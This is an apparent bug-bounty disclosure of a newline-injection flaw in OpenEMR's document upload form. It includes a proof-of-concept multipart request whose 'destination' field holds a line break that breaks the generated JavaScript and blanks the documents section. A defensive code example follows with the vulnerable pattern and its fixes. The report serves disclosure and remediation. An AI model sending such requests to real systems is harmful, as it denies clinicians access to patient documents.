Improper Name Validation in Upload Document Form in openemr/openemr

Valid

Reported on

Oct 6th 2022


Description

The name of any uploaded document can be manipulated through the destination parameter to include new line characters. Such a name breaks the execution of the JS code generated for the "New Documents" section of the "Miscellaneous" menu, which stays blank until the document is removed from the DB.

Proof of Concept

The following request was sent to upload a dummy file with a destination parameter containing a new line character:

POST /openemr/controller.php?document&upload&patient_id=00&parent_id=1& HTTP/1.1
(...snip...)
Content-Type: multipart/form-data; boundary=---------------------------139184551113566022282519832587
Upgrade-Insecure-Requests: 1

-----------------------------139184551113566022282519832587
Content-Disposition: form-data; name="MAX_FILE_SIZE"

64000000
-----------------------------139184551113566022282519832587
Content-Disposition: form-data; name="file[]"; filename="1234.txt"
Content-Type: text/plain

TEST
-----------------------------139184551113566022282519832587
Content-Disposition: form-data; name="dicom_folder[]"; filename=""
Content-Type: application/octet-stream


-----------------------------139184551113566022282519832587
Content-Disposition: form-data; name="destination"

test
1234
-----------------------------139184551113566022282519832587
Content-Disposition: form-data; name="passphrase"


-----------------------------139184551113566022282519832587
Content-Disposition: form-data; name="patient_id"

00
-----------------------------139184551113566022282519832587
Content-Disposition: form-data; name="category_id"

1
-----------------------------139184551113566022282519832587
Content-Disposition: form-data; name="process"

true
-----------------------------139184551113566022282519832587--

That value was used as a "virtual" name and was reflected into the JS code generated for the "New Documents" section:

newNode_14 = newNode.addItem(new TreeNode('2022-10-05 test
1234-16', 'file3.png', '/openemr/controller.php?document&view&patient_id=00&doc_id=16&', false, true, '', '', 'folder-expanded.gif'));

That new line breaks the JS code, so the section contents can no longer be shown, leaving the user without any way to manage files. The browser console reports:

Uncaught SyntaxError: '' string literal contains an unescaped line break controller.php:116:60
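The pattern behind the bug and its defender-side fix, as an added example that is not OpenEMR's own code (function names are assumed for illustration): the raw value is interpolated into a single-quoted JS literal, so a name containing a line break produces an unparseable script; rejecting control characters at upload time and encoding the value as a JS string literal when the script is generated both close the issue.

```javascript
// Added example (not OpenEMR code): the server-side pattern behind this bug
// and two defender-side fixes. Function names are assumed for illustration.

// Constructed sample: the "destination" value from the report, "test\n1234".
const NAME_WITH_NEWLINE = "test\n1234";

// Vulnerable pattern: the value is interpolated raw into a single-quoted JS
// string literal, the shape of the generated addItem() line shown above.
function renderNodeUnsafe(label, docId) {
  return "newNode.addItem(new TreeNode('" + label + "', 'file.png', " +
    "'/openemr/controller.php?document&view&doc_id=" + docId + "&', false, true));";
}

// Fix 1, validation at upload time: a document display name must not contain
// ASCII control characters (0x00-0x1F, 0x7F) or Unicode line separators.
function isValidDocumentName(name) {
  return typeof name === "string" && name.length > 0 &&
    !/[\x00-\x1F\x7F\u2028\u2029]/.test(name);
}

// Fix 2, output encoding when the script is generated: JSON.stringify yields a
// valid JS string literal (a newline becomes \n, quotes are escaped); "<", ">",
// U+2028 and U+2029 are additionally \u-escaped so the literal is also safe
// inside an inline <script> block.
function jsStringLiteral(value) {
  return JSON.stringify(String(value)).replace(/[<>\u2028\u2029]/g,
    (c) => "\\u" + c.charCodeAt(0).toString(16).padStart(4, "0"));
}

function renderNodeSafe(label, docId) {
  const url = "/openemr/controller.php?document&view&doc_id=" + Number(docId) + "&";
  return "newNode.addItem(new TreeNode(" + jsStringLiteral(label) + ", 'file.png', " +
    jsStringLiteral(url) + ", false, true));";
}

// Check whether generated script text parses, which is what the browser does
// before running it. Only the syntax is checked; nothing is executed.
function parses(scriptText) {
  try {
    new Function(scriptText);
    return true;
  } catch (e) {
    return false;
  }
}

// Usage: the raw name breaks the script, the encoded one does not.
console.log(parses(renderNodeUnsafe(NAME_WITH_NEWLINE, 16)));  // false
console.log(parses(renderNodeSafe(NAME_WITH_NEWLINE, 16)));    // true
```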

Impact

Successful exploitation of this issue leads to a denial of service: the documents section stays broken and unusable until the record is removed from the database.

openemr/openemr maintainer has acknowledged this report a year ago
Brady Miller validated this vulnerability a year ago
xkulio has been awarded the disclosure bounty
Brady Miller marked this as fixed in 7.0.0.2 with commit 37d7ed a year ago
This vulnerability will not receive a CVE
Brady Miller published this vulnerability a year ago
Brady Miller (Maintainer), a year ago:

@admin, please assign a CVE. thanks!